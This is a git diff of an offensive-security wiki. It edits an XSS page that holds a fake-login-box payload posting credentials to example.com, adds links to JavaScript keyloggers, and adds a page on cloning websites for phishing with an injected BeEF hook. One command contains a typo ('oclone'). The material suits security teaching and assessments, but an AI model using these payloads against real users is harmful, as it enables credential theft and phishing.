diff --git a/SUMMARY.md b/SUMMARY.md
index 1e2359316..36e26bf23 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -1,13 +1,14 @@
 # Table of contents
 
 * [HackTricks](README.md)
+* [About the author](about-the-author.md)
 * [Getting Started in Hacking](getting-started-in-hacking.md)
 * [Pentesting Methodology](pentesting-methodology.md)
 * [External Recon Methodology](external-recon-methodology.md)
 * [Phishing Methodology](phishing-methodology/README.md)
+  * [Clone a Website](phishing-methodology/clone-a-website.md)
   * [Detecting Phising](phishing-methodology/detecting-phising.md)
   * [Phishing Documents](phishing-methodology/phishing-documents.md)
-* [About the author](about-the-author.md)
 * [Exfiltration](exfiltration.md)
 * [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
 * [Brute Force - CheatSheet](brute-force.md)
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 0a7f5716b..d727731e5 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -651,9 +651,11 @@ for(var i=0; i<ports.length; i++) {
 }
 ```
 
-_Short times indicate a responding port_ _Longer times indicate no response_
+_Short times indicate a responding port_ _Longer times indicate no response._
 
-### Box to as for credentials
+Review the list of ports banned in Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) and in Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
+
+### Box to ask for credentials
 
 ```markup
 <style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
@@ -674,6 +676,15 @@ body:username.value+':'+this.value
 
 When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
 
+### Keylogger
+
+Just searching in github I found a few different ones:
+
+* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
+* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
+* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
+* You can also use metasploit `http_javascript_keylogger`
+
 ### XSS - Stealing CSRF tokens
 
 ```javascript
diff --git a/phishing-methodology/clone-a-website.md b/phishing-methodology/clone-a-website.md
new file mode 100644
index 000000000..0198053e9
--- /dev/null
+++ b/phishing-methodology/clone-a-website.md
@@ -0,0 +1,27 @@
+# Clone a Website
+
+For a phishing assessment sometimes it might be useful to completely **clone a website**.
+
+Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user. 
+
+There are different tools you can use for this purpose:
+
+### wget
+
+```text
+wget -mk -nH
+```
+
+### goclone
+
+```bash
+#https://github.com/imthaghost/goclone
+oclone <url>
+```
+
+### Social Engineering Toolit
+
+```bash
+#https://github.com/trustedsec/social-engineer-toolkit
+```
+